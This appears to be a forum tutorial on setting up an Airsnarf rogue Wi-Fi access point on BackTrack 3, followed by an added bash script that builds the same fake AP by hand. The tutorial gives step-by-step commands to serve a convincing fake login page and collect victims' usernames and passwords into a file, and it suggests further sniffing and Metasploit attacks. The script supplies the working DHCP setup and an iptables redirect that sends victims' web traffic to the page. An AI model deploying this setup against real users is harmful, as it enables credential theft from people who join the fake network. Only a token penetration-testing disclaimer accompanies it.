AIRSNARF

Airsnarf - The Rogue Access Point (BackTrack 3 as Fake AP)

Most probably you won't believe that a Linux machine can act as an access point, but it is true: Atheros chipset based cards can be put into access-point (master) mode. To check whether your card can act as an AP, use the wlanconfig command given below. I have tested it on BackTrack 3 final, using a Netgear WG311T A/G/N AR 2414 chipset
(patched madwifi-ng drivers) with a 7 dBi antenna and a Linksys WUSB54GC (RT73 chipset). The Netgear PCI card I made the rogue AP, and through my other card I scanned the available APs and got the rogue AP working in OPN (open) authentication mode. Voilà.
Use these commands to verify that your card meets airsnarf's requirement, a driver that supports AP (master) mode:
wlanconfig ath0 destroy                            # madwifi-ng creates ath0 in station mode by default, so remove it first
wlanconfig ath0 create wlandev wifi0 wlanmode ap   # 'ap' is wlanconfig's name for master mode (iwconfig reports it as Mode:Master)
If the second command succeeds, the wireless NIC is now acting as an AP; iwconfig ath0 should show Mode:Master.
I have attached a custom-coded file which makes airsnarf a truly convincing, legitimate-looking AP. Download it and unzip it: DOWNLOAD
#replace /pentest/wireless/airsnarf-0.2/cfg/airsnarf.cfg with the attached airsnarf.cfg
#for the wireless interface I recommend Atheros chipset based cards: airsnarf
puts the NIC into access-point (master) mode, which on BackTrack 3 is supported by the
madwifi-ng drivers, and those drive Atheros chipsets.
#place dhcpd.src in /pentest/wireless/airsnarf-0.2/bin
#replace /pentest/wireless/airsnarf-0.2/cfg/cgi-bin/airsnarf.cgi with the attached airsnarf.cgi
#replace index.html in /pentest/wireless/airsnarf-0.2/cfg/html and in /var/www/htdocs with my index.html
#replace airsnarf.jpg in /pentest/wireless/airsnarf-0.2/cfg/html and in /var/www/htdocs with my airsnarf.jpg
#copy apache_pb22_ani.gif from /var/www/htdocs and paste it into /pentest/wireless/airsnarf-0.2/cfg/html
#that is all we have done: made a legitimate-looking login page.
#cd /pentest/wireless/airsnarf-0.2
#./airsnarf
(passwords will be stored in /tmp/airsnarf_pwds.txt)

Setting the rogue AP name to Wifi0wn, and the DHCP network ID and router IP.
Starting the airsnarf script to work as a rogue AP. A great tool for showing the vulnerabilities in the Windows connection manager.
With my other USB wireless NIC, the Linksys WUSB54GC, I am scanning the available networks, where I can see my fake AP is also working, by the name Wifi0wn, with open authentication, 54 Mbps, and on channel 1.
Now with my other card I am trying to get an IP from Wifi0wn and connect without any key.
You can see that ath0 is working as an access point with a random MAC ID, and my rausb0/Linksys adapter got connected to the rogue AP.
In ifconfig we can see that rausb0 got an IP address from the rogue DHCP server of airsnarf.
Now when you surf you will get this login page, which looks totally legitimate. Thanks to me for coding it and redirecting to it.
Redirection of the URL after capturing the username and password.
Default location of the passwords is /tmp/airsnarf_pwds.txt.
List of usernames along with passwords.
This tool is still in progress. I am making it work in nastier ways, like redirecting to some website, or XSS. Use it for social engineering and vulnerability assessment tests. Now you can show that an unaware user can connect to a fake AP without their knowledge, which can lead to compromise of their data. Once they connect to the AP you can run Nmap scans along with the Metasploit Framework, and sniffers like Wireshark for getting HTTP, HTTPS, FTP and Telnet passwords, and many more sophisticated attacks. (Use for PT & VA only.)
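The script below is an added example, not code from this post or from the airsnarf project. It does by hand what the walkthrough above relies on airsnarf to do (AP interface, DHCP handing out the AP as router, HTTP redirect to the fake login page), so you can confirm the card really comes up in master mode before running ./airsnarf. The interface names ath0/wifi0, SSID Wifi0wn, open authentication and channel 1 are taken from the post; the 192.168.1.0/24 network, the 192.168.1.1 router address and the DHCP range are assumptions. It is a dry run by default and only executes the commands with --apply, which needs root and a madwifi-ng Atheros card.

```shell
#!/bin/bash
# Added example (not from the post or the airsnarf project): bring up a
# madwifi-ng Atheros card as an open rogue AP by hand, with DHCP and a
# captive-portal redirect, and verify the result. ath0/wifi0, Wifi0wn and
# channel 1 mirror the post; the addresses below are assumptions.
set -u

ROGUE_SSID="Wifi0wn"
ROGUE_CHANNEL=1
ROGUE_NET="192.168.1.0"   # assumed DHCP network ID
ROGUE_GW="192.168.1.1"    # assumed router IP (the AP itself)
ROGUE_IF="ath0"           # madwifi-ng virtual AP interface
PHY="wifi0"               # madwifi-ng physical device
DHCPD_CONF="/tmp/rogue-dhcpd.conf"

# madwifi-ng commands that turn the card into an open AP. The default ath0
# is a station VAP, so it is destroyed and re-created in 'ap' mode (the only
# spelling wlanconfig accepts; iwconfig then reports Mode:Master).
ap_commands() {
    cat <<EOF
wlanconfig $ROGUE_IF destroy
wlanconfig $ROGUE_IF create wlandev $PHY wlanmode ap
iwconfig $ROGUE_IF essid "$ROGUE_SSID" channel $ROGUE_CHANNEL key off
ifconfig $ROGUE_IF $ROGUE_GW netmask 255.255.255.0 up
EOF
}

# ISC dhcpd.conf for the rogue subnet: the AP hands itself out as router and
# DNS server, so every client's traffic and name lookups pass through it.
dhcpd_conf() {
    local prefix="${ROGUE_NET%.*}"
    cat <<EOF
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
subnet $ROGUE_NET netmask 255.255.255.0 {
    range $prefix.100 $prefix.200;
    option routers $ROGUE_GW;
    option domain-name-servers $ROGUE_GW;
}
EOF
}

# Captive-portal redirect: DNAT every client's port-80 request to the local
# web server, so whatever site the victim surfs to returns the fake login page.
redirect_commands() {
    cat <<EOF
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i $ROGUE_IF -p tcp --dport 80 -j DNAT --to-destination $ROGUE_GW:80
EOF
}

# Check that the VAP really came up as an AP with our SSID. Reads iwconfig
# output on stdin (iwconfig ath0 | check_ap_mode) so it can also be tried on
# captured text; returns non-zero if the card fell back to Managed mode.
check_ap_mode() {
    local out
    out="$(cat)"
    printf '%s\n' "$out" | grep -q 'Mode:Master' &&
        printf '%s\n' "$out" | grep -q "ESSID:\"$ROGUE_SSID\""
}

main() {
    if [ "${1:-}" = "--apply" ]; then
        ap_commands | sh -e
        redirect_commands | sh -e
        dhcpd_conf > "$DHCPD_CONF"
        dhcpd -cf "$DHCPD_CONF" "$ROGUE_IF"
        iwconfig "$ROGUE_IF" | check_ap_mode || { echo "$ROGUE_IF is not in Master mode" >&2; exit 1; }
    else
        echo "# dry run: commands that would be executed (re-run with --apply as root)"
        ap_commands
        redirect_commands
        echo "# $DHCPD_CONF:"
        dhcpd_conf
    fi
}
main "$@"
```

Run it once without arguments to review the commands, then with --apply. After that, ./airsnarf will re-apply its own SSID, network and router settings from cfg/airsnarf.cfg, so the values here should match what you put there; the check_ap_mode step is the part worth keeping, since a card whose driver lacks master mode silently stays in Managed mode and airsnarf then serves nothing.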
